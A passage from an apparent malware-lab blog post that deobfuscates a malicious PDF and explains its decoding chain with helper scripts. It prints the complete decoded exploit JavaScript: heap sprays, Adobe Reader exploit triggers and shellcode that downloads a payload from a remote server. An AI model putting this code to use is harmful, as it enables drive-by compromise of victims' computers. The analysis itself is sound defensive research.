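Pulling a stream like this out by hand is mostly a matter of finding the object and inflating it. Below is a rough Python sketch, assuming a direct integer /Length and an uncorrupted, unencrypted file. It ignores cross reference tables, object streams, and chained filters, so it is nowhere near a real parser. The function name and the synthetic test object are mine.

```python
import re
import zlib

def extract_flate_stream(pdf_bytes: bytes, obj_num: int) -> bytes:
    """Locate 'N 0 obj ... stream' and return the (inflated) stream body."""
    pattern = rb"(?<!\d)" + str(obj_num).encode() + rb" 0 obj(.*?)stream\r?\n"
    match = re.search(pattern, pdf_bytes, re.DOTALL)
    if match is None:
        raise ValueError(f"object {obj_num} not found")
    header = match.group(1)
    length = re.search(rb"/Length\s+(\d+)", header)
    if length is None:
        raise ValueError("no direct /Length in stream dictionary")
    # Slice by /Length rather than hunting for 'endstream' inside binary data.
    body = pdf_bytes[match.end():match.end() + int(length.group(1))]
    return zlib.decompress(body) if b"/FlateDecode" in header else body

# Synthetic stand-in for object 51, built only for this example.
payload = b"lka166lka175lka16e"
compressed = zlib.compress(payload)
pdf = (b"51 0 obj\n<<\n/Filter /FlateDecode\n/Length "
       + str(len(compressed)).encode()
       + b"\n>>\nstream\n" + compressed + b"\nendstream\nendobj\n")
print(extract_flate_stream(pdf, 51))  # b'lka166lka175lka16e'
```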

 

 

If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:

perl -ne 'chomp; s/lka1//g; print(pack("H*",$_));'
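
The same transform can be written in Python the way the sample itself does it: swap the marker for a percent sign, then percent-decode. This sketch assumes plain %XX escapes only; Javascript's unescape() also understands %uXXXX, which urllib does not. It performs a single pass, while the sample's last fragment unescapes twice, so a second pass may be needed on real data. The function name is mine.

```python
from urllib.parse import unquote

def decode_lka(encoded: str, marker: str = "lka1") -> str:
    """Apply the sample's transform: marker -> '%', then one pass of percent-decoding."""
    return unquote(encoded.replace(marker, "%"), encoding="latin-1")

# First few units of the decompressed stream quoted above.
print(decode_lka("lka166lka175lka16elka163lka174lka169"))  # functi
```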

 

 

31 0 obj

<< /S /JavaScript /JS 32 0 R >>

endobj

32 0 obj

<<

/Filter /FlateDecode

/Length 159

>>

stream

 

Uncompressed:

 

 

var xyuvam = 'lka';

var z = unescape;

var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';

eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');

eval('var bu'+'hae'+'ca = ev'+'a'+'l;');

 

 

endstream

endobj

 

 

 

 

33 0 obj

<< /S /JavaScript /JS 34 0 R >>

endobj

34 0 obj

<<

/Filter /FlateDecode

/Length 102

>>

stream

Uncompressed:

 

 

buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');

var poxyunavse = 'xyuznaet.re';

 

 

endstream

endobj

 

 

Obviously, %66%6f%2e%61%75%74 is fo.aut, so gluing that all together, it becomes this.info.author;, otherwise known as Object #51 (shown above).

 

 

35 0 obj

<< /S /JavaScript /JS 36 0 R >>

endobj

36 0 obj

<<

/Filter /FlateDecode

/Length 88

>>

stream

Uncompressed:

 

 

var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;

var xxx = buhaeca(lkaa);

 

 

endstream

endobj

 

 

 

 

37 0 obj

<< /S /JavaScript /JS 38 0 R >>

endobj

38 0 obj

<<

/Filter /FlateDecode

/Length 60

>>

stream

Uncompressed:

 

 

var ietoktoewe = z(unescape(xxx));

buhaeca(ietoktoewe);

 

 

endstream

endobj
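
To see what the four fragments add up to, the string concatenation can be replayed outside of Acrobat. This Python sketch copies the string pieces from objects 32, 34, and 36 and joins them the same way. Nothing is evaluated, and I have assumed the percent-escaped arguments were quoted strings in the original.

```python
from urllib.parse import unquote

# Pieces copied from the Javascript fragments above.
xyuvam = "lka"
yhahahahahahavvvvvv = "p" + unquote("%6c%61%63%65") + "(/"
nenadoAVscaner = "1/g,bolshayapizdavam)"
poxyunavse = "xyuznaet.re"

# Object 34: the expression that reads the metadata field.
author_expr = "this.in" + unquote("%66%6f%2e%61%75%74") + "hor;"

# Object 36: the expression that is handed to the aliased eval.
lkaa = poxyunavse + yhahahahahahavvvvvv + xyuvam + nenadoAVscaner

print(author_expr)  # this.info.author;
print(lkaa)         # xyuznaet.replace(/lka1/g,bolshayapizdavam)
```

So the whole dance amounts to reading info.author, replacing every lka1 with a percent sign, unescaping, and evaluating the result.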

 

 

So, one of the odd things about this PDF is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from 123 0 R to something easier to remember, like /Bob.)

 

 

 

48 0 obj

<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]

>>

endobj

 

Also, Object #5 and Object #14 are empty. These are info.Title and info.Producer respectively.

 

5 0 obj

<<

/Filter /FlateDecode

/Length 0

>>

stream

endstream

endobj

14 0 obj

<<

/Filter /FlateDecode

/Length 0

>>

stream

endstream

endobj

51 0 R Decoded

function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}

function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34

%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B

%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324

%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B

%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455

%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF

%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F

%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");

var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e

%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273

%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);

memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",

new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)

{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040

%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44

%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150

%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56

%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865

%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56

%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60

%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073

%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;

var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;

while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}

var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}

var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){

var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44

%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150

%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56

%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865

%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56

%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60

%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073

%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;

var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(

var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");

while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78

%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455

%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA

%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA

%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D

%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856

%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862

%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);

var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(

var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");

while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}

function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');

var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}

if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}

if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();
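
The version checks in PPPDDDFF() are easier to reason about when replayed outside the viewer. This Python sketch mirrors the three conditions as written, assuming a missing digit compares like 0 (which is how the Javascript coercion of an empty string behaves). The Python function name is mine; the returned names are the sample's own functions.

```python
import re

def dispatched_exploits(viewer_version: str) -> list:
    """Return the sample's functions that PPPDDDFF() would call for a version string."""
    digits = re.sub(r"\D", "", viewer_version)
    # First three digits; a missing digit behaves like 0 in the original comparisons.
    v = [int(digits[i]) if i < len(digits) else 0 for i in range(3)]
    called = []
    if (v[0] == 8 and v[1] == 0) or (v[1] == 1 and v[2] < 3):
        called.append("util_printf")
    if v[0] < 8 or (v[0] == 8 and v[1] < 2 and v[2] < 2):
        called.append("collab_email")
    if v[0] < 9 or (v[0] == 9 and v[1] < 1):
        called.append("collab_geticon")
    called.append("printd")  # always runs; this is the media.newPlayer path
    return called

for version in ("8.0", "9.1", "9.2"):
    print(version, dispatched_exploits(version))
```

Under this reading, "9.1" still reaches util_printf, because && binds tighter than || and the second half of the first test never looks at the major version.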

 

 

 

 

And these seem to be on this exact same topic

 

 

http://isc.sans.org/diary.html?storyid=7906

 


 

¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.

² Neosploit and Mebroot go together like peanut butter and chocolate.

³ It looks almost exactly like the simple example in Annex H of the PDF specification.

⁴ This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.

 

 

 


 

 


 

 

Julia Wolf @ FireEye Malware Intelligence Lab

 

Questions/Comments to research [@] fireeye [.] com